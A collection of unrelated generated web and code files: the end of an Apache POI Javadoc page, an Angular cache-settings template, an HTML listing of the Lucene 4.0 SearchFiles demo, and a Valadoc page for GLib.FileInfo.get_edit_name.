ShapeContainer">S</A>,<A HREF="../../../../../../org/apache/poi/sl/usermodel/ShapeContainer.html" title="type parameter in ShapeContainer">P</A>&gt;</CODE></FONT></TD> <TD><CODE><B>ShapeContainer.</B><B><A HREF="../../../../../../org/apache/poi/sl/usermodel/ShapeContainer.html#createConnector()">createConnector</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;create a connector</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.poi.xslf.usermodel"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A> in <A HREF="../../../../../../org/apache/poi/xslf/usermodel/package-summary.html">org.apache.poi.xslf.usermodel</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Classes in <A HREF="../../../../../../org/apache/poi/xslf/usermodel/package-summary.html">org.apache.poi.xslf.usermodel</A> that implement <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../org/apache/poi/xslf/usermodel/XSLFConnectorShape.html" title="class in org.apache.poi.xslf.usermodel">XSLFConnectorShape</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Specifies a connection shape.</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../index.html?org/apache/poi/sl/usermodel/\class-useConnectorShape.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="ConnectorShape.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> <i>Copyright 2016 The Apache Software Foundation or its licensors, as applicable.</i> </BODY> </HTML>
src/client/settings/templates/settings-cache.html
butterproject/butter-desktop-angular
<section class="settings-panel" id="cache"> <div class="settings-panel-header"> Cache </div> <div class="settings-panel-body"> <md-input-container> <label>Cache Directory</label> <input type="text" placeholder="Cache Directory" id="faketmpLocation" ng-model="settings.config.tmpLocation" readonly="readonly" size="65" aria-label="Cache directory"/> <i class="open-tmp-folder fa fa-folder-open-o tooltipped" data-toggle="tooltip" data-placement="auto" title="Open Cache Directory"></i> </md-input-container> <md-input-container> <md-checkbox ng-model="settings.config.deleteTmpOnClose"> <i class="material-icons">delete_forever</i> Clear Tmp Folder after closing app? </md-checkbox> </md-input-container> </div> </section>
lib/lucene-4.0.0/docs/demo/src-html/org/apache/lucene/demo/SearchFiles.html
dburgmann/fbRecommender
<HTML> <BODY BGCOLOR="white"> <PRE> <FONT color="green">001</FONT> package org.apache.lucene.demo;<a name="line.1"></a> <FONT color="green">002</FONT> <a name="line.2"></a> <FONT color="green">003</FONT> /*<a name="line.3"></a> <FONT color="green">004</FONT> * Licensed to the Apache Software Foundation (ASF) under one or more<a name="line.4"></a> <FONT color="green">005</FONT> * contributor license agreements. See the NOTICE file distributed with<a name="line.5"></a> <FONT color="green">006</FONT> * this work for additional information regarding copyright ownership.<a name="line.6"></a> <FONT color="green">007</FONT> * The ASF licenses this file to You under the Apache License, Version 2.0<a name="line.7"></a> <FONT color="green">008</FONT> * (the "License"); you may not use this file except in compliance with<a name="line.8"></a> <FONT color="green">009</FONT> * the License. You may obtain a copy of the License at<a name="line.9"></a> <FONT color="green">010</FONT> *<a name="line.10"></a> <FONT color="green">011</FONT> * http://www.apache.org/licenses/LICENSE-2.0<a name="line.11"></a> <FONT color="green">012</FONT> *<a name="line.12"></a> <FONT color="green">013</FONT> * Unless required by applicable law or agreed to in writing, software<a name="line.13"></a> <FONT color="green">014</FONT> * distributed under the License is distributed on an "AS IS" BASIS,<a name="line.14"></a> <FONT color="green">015</FONT> * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<a name="line.15"></a> <FONT color="green">016</FONT> * See the License for the specific language governing permissions and<a name="line.16"></a> <FONT color="green">017</FONT> * limitations under the License.<a name="line.17"></a> <FONT color="green">018</FONT> */<a name="line.18"></a> <FONT color="green">019</FONT> <a name="line.19"></a> <FONT color="green">020</FONT> import java.io.BufferedReader;<a name="line.20"></a> <FONT color="green">021</FONT> import java.io.File;<a name="line.21"></a> <FONT color="green">022</FONT> import java.io.FileInputStream;<a name="line.22"></a> <FONT color="green">023</FONT> import java.io.IOException;<a name="line.23"></a> <FONT color="green">024</FONT> import java.io.InputStreamReader;<a name="line.24"></a> <FONT color="green">025</FONT> import java.util.Date;<a name="line.25"></a> <FONT color="green">026</FONT> <a name="line.26"></a> <FONT color="green">027</FONT> import org.apache.lucene.analysis.Analyzer;<a name="line.27"></a> <FONT color="green">028</FONT> import org.apache.lucene.analysis.standard.StandardAnalyzer;<a name="line.28"></a> <FONT color="green">029</FONT> import org.apache.lucene.document.Document;<a name="line.29"></a> <FONT color="green">030</FONT> import org.apache.lucene.index.DirectoryReader;<a name="line.30"></a> <FONT color="green">031</FONT> import org.apache.lucene.index.IndexReader;<a name="line.31"></a> <FONT color="green">032</FONT> import org.apache.lucene.queryparser.classic.QueryParser;<a name="line.32"></a> <FONT color="green">033</FONT> import org.apache.lucene.search.IndexSearcher;<a name="line.33"></a> <FONT color="green">034</FONT> import org.apache.lucene.search.Query;<a name="line.34"></a> <FONT color="green">035</FONT> import org.apache.lucene.search.ScoreDoc;<a name="line.35"></a> <FONT color="green">036</FONT> import org.apache.lucene.search.TopDocs;<a name="line.36"></a> <FONT color="green">037</FONT> import org.apache.lucene.store.FSDirectory;<a name="line.37"></a> <FONT color="green">038</FONT> import org.apache.lucene.util.Version;<a name="line.38"></a> <FONT color="green">039</FONT> <a name="line.39"></a> <FONT color="green">040</FONT> /** Simple command-line based search demo. */<a name="line.40"></a> <FONT color="green">041</FONT> public class SearchFiles {<a name="line.41"></a> <FONT color="green">042</FONT> <a name="line.42"></a> <FONT color="green">043</FONT> private SearchFiles() {}<a name="line.43"></a> <FONT color="green">044</FONT> <a name="line.44"></a> <FONT color="green">045</FONT> /** Simple command-line based search demo. */<a name="line.45"></a> <FONT color="green">046</FONT> public static void main(String[] args) throws Exception {<a name="line.46"></a> <FONT color="green">047</FONT> String usage =<a name="line.47"></a> <FONT color="green">048</FONT> "Usage:\tjava org.apache.lucene.demo.SearchFiles [-index dir] [-field f] [-repeat n] [-queries file] [-query string] [-raw] [-paging hitsPerPage]\n\nSee http://lucene.apache.org/java/4_0/demo.html for details.";<a name="line.48"></a> <FONT color="green">049</FONT> if (args.length &gt; 0 &amp;&amp; ("-h".equals(args[0]) || "-help".equals(args[0]))) {<a name="line.49"></a> <FONT color="green">050</FONT> System.out.println(usage);<a name="line.50"></a> <FONT color="green">051</FONT> System.exit(0);<a name="line.51"></a> <FONT color="green">052</FONT> }<a name="line.52"></a> <FONT color="green">053</FONT> <a name="line.53"></a> <FONT color="green">054</FONT> String index = "index";<a name="line.54"></a> <FONT color="green">055</FONT> String field = "contents";<a name="line.55"></a> <FONT color="green">056</FONT> String queries = null;<a name="line.56"></a> <FONT color="green">057</FONT> int repeat = 0;<a name="line.57"></a> <FONT color="green">058</FONT> boolean raw = false;<a name="line.58"></a> <FONT color="green">059</FONT> String queryString = null;<a name="line.59"></a> <FONT color="green">060</FONT> int hitsPerPage = 10;<a name="line.60"></a> <FONT color="green">061</FONT> <a name="line.61"></a> <FONT color="green">062</FONT> for(int i = 0;i &lt; args.length;i++) {<a name="line.62"></a> <FONT color="green">063</FONT> if ("-index".equals(args[i])) {<a name="line.63"></a> <FONT color="green">064</FONT> index = args[i+1];<a name="line.64"></a> <FONT color="green">065</FONT> i++;<a name="line.65"></a> <FONT color="green">066</FONT> } else if ("-field".equals(args[i])) {<a name="line.66"></a> <FONT color="green">067</FONT> field = args[i+1];<a name="line.67"></a> <FONT color="green">068</FONT> i++;<a name="line.68"></a> <FONT color="green">069</FONT> } else if ("-queries".equals(args[i])) {<a name="line.69"></a> <FONT color="green">070</FONT> queries = args[i+1];<a name="line.70"></a> <FONT color="green">071</FONT> i++;<a name="line.71"></a> <FONT color="green">072</FONT> } else if ("-query".equals(args[i])) {<a name="line.72"></a> <FONT color="green">073</FONT> queryString = args[i+1];<a name="line.73"></a> <FONT color="green">074</FONT> i++;<a name="line.74"></a> <FONT color="green">075</FONT> } else if ("-repeat".equals(args[i])) {<a name="line.75"></a> <FONT color="green">076</FONT> repeat = Integer.parseInt(args[i+1]);<a name="line.76"></a> <FONT color="green">077</FONT> i++;<a name="line.77"></a> <FONT color="green">078</FONT> } else if ("-raw".equals(args[i])) {<a name="line.78"></a> <FONT color="green">079</FONT> raw = true;<a name="line.79"></a> <FONT color="green">080</FONT> } else if ("-paging".equals(args[i])) {<a name="line.80"></a> <FONT color="green">081</FONT> hitsPerPage = Integer.parseInt(args[i+1]);<a name="line.81"></a> <FONT color="green">082</FONT> if (hitsPerPage &lt;= 0) {<a name="line.82"></a> <FONT color="green">083</FONT> System.err.println("There must be at least 1 hit per page.");<a name="line.83"></a> <FONT color="green">084</FONT> System.exit(1);<a name="line.84"></a> <FONT color="green">085</FONT> }<a name="line.85"></a> <FONT color="green">086</FONT> i++;<a name="line.86"></a> <FONT color="green">087</FONT> }<a name="line.87"></a> <FONT color="green">088</FONT> }<a name="line.88"></a> <FONT color="green">089</FONT> <a name="line.89"></a> <FONT color="green">090</FONT> IndexReader reader = DirectoryReader.open(FSDirectory.open(new File(index)));<a name="line.90"></a> <FONT color="green">091</FONT> IndexSearcher searcher = new IndexSearcher(reader);<a name="line.91"></a> <FONT color="green">092</FONT> Analyzer analyzer = new StandardAnalyzer(Version.LUCENE_40);<a name="line.92"></a> <FONT color="green">093</FONT> <a name="line.93"></a> <FONT color="green">094</FONT> BufferedReader in = null;<a name="line.94"></a> <FONT color="green">095</FONT> if (queries != null) {<a name="line.95"></a> <FONT color="green">096</FONT> in = new BufferedReader(new InputStreamReader(new FileInputStream(queries), "UTF-8"));<a name="line.96"></a> <FONT color="green">097</FONT> } else {<a name="line.97"></a> <FONT color="green">098</FONT> in = new BufferedReader(new InputStreamReader(System.in, "UTF-8"));<a name="line.98"></a> <FONT color="green">099</FONT> }<a name="line.99"></a> <FONT color="green">100</FONT> QueryParser parser = new QueryParser(Version.LUCENE_40, field, analyzer);<a name="line.100"></a> <FONT color="green">101</FONT> while (true) {<a name="line.101"></a> <FONT color="green">102</FONT> if (queries == null &amp;&amp; queryString == null) { // prompt the user<a name="line.102"></a> <FONT color="green">103</FONT> System.out.println("Enter query: ");<a name="line.103"></a> <FONT color="green">104</FONT> }<a name="line.104"></a> <FONT color="green">105</FONT> <a name="line.105"></a> <FONT color="green">106</FONT> String line = queryString != null ? queryString : in.readLine();<a name="line.106"></a> <FONT color="green">107</FONT> <a name="line.107"></a> <FONT color="green">108</FONT> if (line == null || line.length() == -1) {<a name="line.108"></a> <FONT color="green">109</FONT> break;<a name="line.109"></a> <FONT color="green">110</FONT> }<a name="line.110"></a> <FONT color="green">111</FONT> <a name="line.111"></a> <FONT color="green">112</FONT> line = line.trim();<a name="line.112"></a> <FONT color="green">113</FONT> if (line.length() == 0) {<a name="line.113"></a> <FONT color="green">114</FONT> break;<a name="line.114"></a> <FONT color="green">115</FONT> }<a name="line.115"></a> <FONT color="green">116</FONT> <a name="line.116"></a> <FONT color="green">117</FONT> Query query = parser.parse(line);<a name="line.117"></a> <FONT color="green">118</FONT> System.out.println("Searching for: " + query.toString(field));<a name="line.118"></a> <FONT color="green">119</FONT> <a name="line.119"></a> <FONT color="green">120</FONT> if (repeat &gt; 0) { // repeat &amp; time as benchmark<a name="line.120"></a> <FONT color="green">121</FONT> Date start = new Date();<a name="line.121"></a> <FONT color="green">122</FONT> for (int i = 0; i &lt; repeat; i++) {<a name="line.122"></a> <FONT color="green">123</FONT> searcher.search(query, null, 100);<a name="line.123"></a> <FONT color="green">124</FONT> }<a name="line.124"></a> <FONT color="green">125</FONT> Date end = new Date();<a name="line.125"></a> <FONT color="green">126</FONT> System.out.println("Time: "+(end.getTime()-start.getTime())+"ms");<a name="line.126"></a> <FONT color="green">127</FONT> }<a name="line.127"></a> <FONT color="green">128</FONT> <a name="line.128"></a> <FONT color="green">129</FONT> doPagingSearch(in, searcher, query, hitsPerPage, raw, queries == null &amp;&amp; queryString == null);<a name="line.129"></a> <FONT color="green">130</FONT> <a name="line.130"></a> <FONT color="green">131</FONT> if (queryString != null) {<a name="line.131"></a> <FONT color="green">132</FONT> break;<a name="line.132"></a> <FONT color="green">133</FONT> }<a name="line.133"></a> <FONT color="green">134</FONT> }<a name="line.134"></a> <FONT color="green">135</FONT> reader.close();<a name="line.135"></a> <FONT color="green">136</FONT> }<a name="line.136"></a> <FONT color="green">137</FONT> <a name="line.137"></a> <FONT color="green">138</FONT> /**<a name="line.138"></a> <FONT color="green">139</FONT> * This demonstrates a typical paging search scenario, where the search engine presents <a name="line.139"></a> <FONT color="green">140</FONT> * pages of size n to the user. The user can then go to the next page if interested in<a name="line.140"></a> <FONT color="green">141</FONT> * the next hits.<a name="line.141"></a> <FONT color="green">142</FONT> * <a name="line.142"></a> <FONT color="green">143</FONT> * When the query is executed for the first time, then only enough results are collected<a name="line.143"></a> <FONT color="green">144</FONT> * to fill 5 result pages. If the user wants to page beyond this limit, then the query<a name="line.144"></a> <FONT color="green">145</FONT> * is executed another time and all hits are collected.<a name="line.145"></a> <FONT color="green">146</FONT> * <a name="line.146"></a> <FONT color="green">147</FONT> */<a name="line.147"></a> <FONT color="green">148</FONT> public static void doPagingSearch(BufferedReader in, IndexSearcher searcher, Query query, <a name="line.148"></a> <FONT color="green">149</FONT> int hitsPerPage, boolean raw, boolean interactive) throws IOException {<a name="line.149"></a> <FONT color="green">150</FONT> <a name="line.150"></a> <FONT color="green">151</FONT> // Collect enough docs to show 5 pages<a name="line.151"></a> <FONT color="green">152</FONT> TopDocs results = searcher.search(query, 5 * hitsPerPage);<a name="line.152"></a> <FONT color="green">153</FONT> ScoreDoc[] hits = results.scoreDocs;<a name="line.153"></a> <FONT color="green">154</FONT> <a name="line.154"></a> <FONT color="green">155</FONT> int numTotalHits = results.totalHits;<a name="line.155"></a> <FONT color="green">156</FONT> System.out.println(numTotalHits + " total matching documents");<a name="line.156"></a> <FONT color="green">157</FONT> <a name="line.157"></a> <FONT color="green">158</FONT> int start = 0;<a name="line.158"></a> <FONT color="green">159</FONT> int end = Math.min(numTotalHits, hitsPerPage);<a name="line.159"></a> <FONT color="green">160</FONT> <a name="line.160"></a> <FONT color="green">161</FONT> while (true) {<a name="line.161"></a> <FONT color="green">162</FONT> if (end &gt; hits.length) {<a name="line.162"></a> <FONT color="green">163</FONT> System.out.println("Only results 1 - " + hits.length +" of " + numTotalHits + " total matching documents collected.");<a name="line.163"></a> <FONT color="green">164</FONT> System.out.println("Collect more (y/n) ?");<a name="line.164"></a> <FONT color="green">165</FONT> String line = in.readLine();<a name="line.165"></a> <FONT color="green">166</FONT> if (line.length() == 0 || line.charAt(0) == 'n') {<a name="line.166"></a> <FONT color="green">167</FONT> break;<a name="line.167"></a> <FONT color="green">168</FONT> }<a name="line.168"></a> <FONT color="green">169</FONT> <a name="line.169"></a> <FONT color="green">170</FONT> hits = searcher.search(query, numTotalHits).scoreDocs;<a name="line.170"></a> <FONT color="green">171</FONT> }<a name="line.171"></a> <FONT color="green">172</FONT> <a name="line.172"></a> <FONT color="green">173</FONT> end = Math.min(hits.length, start + hitsPerPage);<a name="line.173"></a> <FONT color="green">174</FONT> <a name="line.174"></a> <FONT color="green">175</FONT> for (int i = start; i &lt; end; i++) {<a name="line.175"></a> <FONT color="green">176</FONT> if (raw) { // output raw format<a name="line.176"></a> <FONT color="green">177</FONT> System.out.println("doc="+hits[i].doc+" score="+hits[i].score);<a name="line.177"></a> <FONT color="green">178</FONT> continue;<a name="line.178"></a> <FONT color="green">179</FONT> }<a name="line.179"></a> <FONT color="green">180</FONT> <a name="line.180"></a> <FONT color="green">181</FONT> Document doc = searcher.doc(hits[i].doc);<a name="line.181"></a> <FONT color="green">182</FONT> String path = doc.get("path");<a name="line.182"></a> <FONT color="green">183</FONT> if (path != null) {<a name="line.183"></a> <FONT color="green">184</FONT> System.out.println((i+1) + ". " + path);<a name="line.184"></a> <FONT color="green">185</FONT> String title = doc.get("title");<a name="line.185"></a> <FONT color="green">186</FONT> if (title != null) {<a name="line.186"></a> <FONT color="green">187</FONT> System.out.println(" Title: " + doc.get("title"));<a name="line.187"></a> <FONT color="green">188</FONT> }<a name="line.188"></a> <FONT color="green">189</FONT> } else {<a name="line.189"></a> <FONT color="green">190</FONT> System.out.println((i+1) + ". " + "No path for this document");<a name="line.190"></a> <FONT color="green">191</FONT> }<a name="line.191"></a> <FONT color="green">192</FONT> <a name="line.192"></a> <FONT color="green">193</FONT> }<a name="line.193"></a> <FONT color="green">194</FONT> <a name="line.194"></a> <FONT color="green">195</FONT> if (!interactive || end == 0) {<a name="line.195"></a> <FONT color="green">196</FONT> break;<a name="line.196"></a> <FONT color="green">197</FONT> }<a name="line.197"></a> <FONT color="green">198</FONT> <a name="line.198"></a> <FONT color="green">199</FONT> if (numTotalHits &gt;= end) {<a name="line.199"></a> <FONT color="green">200</FONT> boolean quit = false;<a name="line.200"></a> <FONT color="green">201</FONT> while (true) {<a name="line.201"></a> <FONT color="green">202</FONT> System.out.print("Press ");<a name="line.202"></a> <FONT color="green">203</FONT> if (start - hitsPerPage &gt;= 0) {<a name="line.203"></a> <FONT color="green">204</FONT> System.out.print("(p)revious page, "); <a name="line.204"></a> <FONT color="green">205</FONT> }<a name="line.205"></a> <FONT color="green">206</FONT> if (start + hitsPerPage &lt; numTotalHits) {<a name="line.206"></a> <FONT color="green">207</FONT> System.out.print("(n)ext page, ");<a name="line.207"></a> <FONT color="green">208</FONT> }<a name="line.208"></a> <FONT color="green">209</FONT> System.out.println("(q)uit or enter number to jump to a page.");<a name="line.209"></a> <FONT color="green">210</FONT> <a name="line.210"></a> <FONT color="green">211</FONT> String line = in.readLine();<a name="line.211"></a> <FONT color="green">212</FONT> if (line.length() == 0 || line.charAt(0)=='q') {<a name="line.212"></a> <FONT color="green">213</FONT> quit = true;<a name="line.213"></a> <FONT color="green">214</FONT> break;<a name="line.214"></a> <FONT color="green">215</FONT> }<a name="line.215"></a> <FONT color="green">216</FONT> if (line.charAt(0) == 'p') {<a name="line.216"></a> <FONT color="green">217</FONT> start = Math.max(0, start - hitsPerPage);<a name="line.217"></a> <FONT color="green">218</FONT> break;<a name="line.218"></a> <FONT color="green">219</FONT> } else if (line.charAt(0) == 'n') {<a name="line.219"></a> <FONT color="green">220</FONT> if (start + hitsPerPage &lt; numTotalHits) {<a name="line.220"></a> <FONT color="green">221</FONT> start+=hitsPerPage;<a name="line.221"></a> <FONT color="green">222</FONT> }<a name="line.222"></a> <FONT color="green">223</FONT> break;<a name="line.223"></a> <FONT color="green">224</FONT> } else {<a name="line.224"></a> <FONT color="green">225</FONT> int page = Integer.parseInt(line);<a name="line.225"></a> <FONT color="green">226</FONT> if ((page - 1) * hitsPerPage &lt; numTotalHits) {<a name="line.226"></a> <FONT color="green">227</FONT> start = (page - 1) * hitsPerPage;<a name="line.227"></a> <FONT color="green">228</FONT> break;<a name="line.228"></a> <FONT color="green">229</FONT> } else {<a name="line.229"></a> <FONT color="green">230</FONT> System.out.println("No such page");<a name="line.230"></a> <FONT color="green">231</FONT> }<a name="line.231"></a> <FONT color="green">232</FONT> }<a name="line.232"></a> <FONT color="green">233</FONT> }<a name="line.233"></a> <FONT color="green">234</FONT> if (quit) break;<a name="line.234"></a> <FONT color="green">235</FONT> end = Math.min(numTotalHits, start + hitsPerPage);<a name="line.235"></a> <FONT color="green">236</FONT> }<a name="line.236"></a> <FONT color="green">237</FONT> }<a name="line.237"></a> <FONT color="green">238</FONT> }<a name="line.238"></a> <FONT color="green">239</FONT> }<a name="line.239"></a> </PRE> </BODY> </HTML>
doc/gio-2.0/GLib.FileInfo.get_edit_name.html
themightyug/ledborg-server
<?xml version="1.0" encoding="utf-8"?> <html> <head> <title>GLib.FileInfo.get_edit_name -- Vala Binding Reference</title> <link href="../style.css" rel="stylesheet" type="text/css"/><script src="../scripts.js" type="text/javascript"> </script> </head> <body> <div class="site_header">GLib.FileInfo.get_edit_name Reference Manual</div> <div class="site_body"> <div class="site_navigation"> <ul class="navi_main"> <li class="package_index"><a href="../index.html">Packages</a></li> </ul> <hr class="navi_hr"/> <ul class="navi_main"> <li class="package"><a href="index.htm">gio-2.0</a></li> </ul> <hr class="navi_hr"/> <ul class="navi_main"> <li class="namespace"><a href="GLib.html">GLib</a></li> </ul> <hr class="navi_hr"/> <ul class="navi_main"> <li class="class"><a href="GLib.FileInfo.html">FileInfo</a></li> </ul> <hr class="navi_hr"/> <ul class="navi_main"> <li class="creation_method"><a href="GLib.FileInfo.FileInfo.html">FileInfo</a></li> <li class="method"><a href="GLib.FileInfo.clear_status.html">clear_status</a></li> <li class="method"><a href="GLib.FileInfo.copy_into.html">copy_into</a></li> <li class="method"><a href="GLib.FileInfo.dup.html">dup</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_as_string.html">get_attribute_as_string</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_boolean.html">get_attribute_boolean</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_byte_string.html">get_attribute_byte_string</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_data.html">get_attribute_data</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_int32.html">get_attribute_int32</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_int64.html">get_attribute_int64</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_object.html">get_attribute_object</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_status.html">get_attribute_status</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_string.html">get_attribute_string</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_stringv.html">get_attribute_stringv</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_type.html">get_attribute_type</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_uint32.html">get_attribute_uint32</a></li> <li class="method"><a href="GLib.FileInfo.get_attribute_uint64.html">get_attribute_uint64</a></li> <li class="method"><a href="GLib.FileInfo.get_content_type.html">get_content_type</a></li> <li class="method"><a href="GLib.FileInfo.get_display_name.html">get_display_name</a></li> <li class="method">get_edit_name</li> <li class="method"><a href="GLib.FileInfo.get_etag.html">get_etag</a></li> <li class="method"><a href="GLib.FileInfo.get_file_type.html">get_file_type</a></li> <li class="method"><a href="GLib.FileInfo.get_icon.html">get_icon</a></li> <li class="method"><a href="GLib.FileInfo.get_is_backup.html">get_is_backup</a></li> <li class="method"><a href="GLib.FileInfo.get_is_hidden.html">get_is_hidden</a></li> <li class="method"><a href="GLib.FileInfo.get_is_symlink.html">get_is_symlink</a></li> <li class="method"><a href="GLib.FileInfo.get_modification_time.html">get_modification_time</a></li> <li class="method"><a href="GLib.FileInfo.get_name.html">get_name</a></li> <li class="method"><a href="GLib.FileInfo.get_size.html">get_size</a></li> <li class="method"><a href="GLib.FileInfo.get_sort_order.html">get_sort_order</a></li> <li class="method"><a href="GLib.FileInfo.get_symbolic_icon.html">get_symbolic_icon</a></li> <li class="method"><a href="GLib.FileInfo.get_symlink_target.html">get_symlink_target</a></li> <li class="method"><a href="GLib.FileInfo.has_attribute.html">has_attribute</a></li> <li class="method"><a href="GLib.FileInfo.has_namespace.html">has_namespace</a></li> <li class="method"><a href="GLib.FileInfo.list_attributes.html">list_attributes</a></li> <li class="method"><a href="GLib.FileInfo.remove_attribute.html">remove_attribute</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute.html">set_attribute</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_boolean.html">set_attribute_boolean</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_byte_string.html">set_attribute_byte_string</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_int32.html">set_attribute_int32</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_int64.html">set_attribute_int64</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_mask.html">set_attribute_mask</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_object.html">set_attribute_object</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_status.html">set_attribute_status</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_string.html">set_attribute_string</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_stringv.html">set_attribute_stringv</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_uint32.html">set_attribute_uint32</a></li> <li class="method"><a href="GLib.FileInfo.set_attribute_uint64.html">set_attribute_uint64</a></li> <li class="method"><a href="GLib.FileInfo.set_content_type.html">set_content_type</a></li> <li class="method"><a href="GLib.FileInfo.set_display_name.html">set_display_name</a></li> <li class="method"><a href="GLib.FileInfo.set_edit_name.html">set_edit_name</a></li> <li class="method"><a href="GLib.FileInfo.set_file_type.html">set_file_type</a></li> <li class="method"><a href="GLib.FileInfo.set_icon.html">set_icon</a></li> <li class="method"><a href="GLib.FileInfo.set_is_hidden.html">set_is_hidden</a></li> <li class="method"><a href="GLib.FileInfo.set_is_symlink.html">set_is_symlink</a></li> <li class="method"><a href="GLib.FileInfo.set_modification_time.html">set_modification_time</a></li> <li class="method"><a href="GLib.FileInfo.set_name.html">set_name</a></li> <li class="method"><a href="GLib.FileInfo.set_size.html">set_size</a></li> <li class="method"><a href="GLib.FileInfo.set_sort_order.html">set_sort_order</a></li> <li class="method"><a href="GLib.FileInfo.set_symbolic_icon.html">set_symbolic_icon</a></li> <li class="method"><a href="GLib.FileInfo.set_symlink_target.html">set_symlink_target</a></li> <li class="method"><a href="GLib.FileInfo.unset_attribute_mask.html">unset_attribute_mask</a></li> </ul> </div> <div class="site_content"> <h1 class="main_title">get_edit_name</h1> <hr class="main_hr"/> <h2 class="main_title">Description:</h2> <div class="main_code_definition"><span class="main_keyword">public</span> <span class="main_keyword">unowned</span> <span class="main_basic_type"><a href="../glib-2.0/string.html" class="class">string</a></span> <b><span css="method">get_edit_name</span></b> () </div> </div> </div><br/> <div class="site_footer">Generated by <a href="http://www.valadoc.org/">Valadoc</a> </div> </body> </html>
docs/html/namespacemembers_vars.html
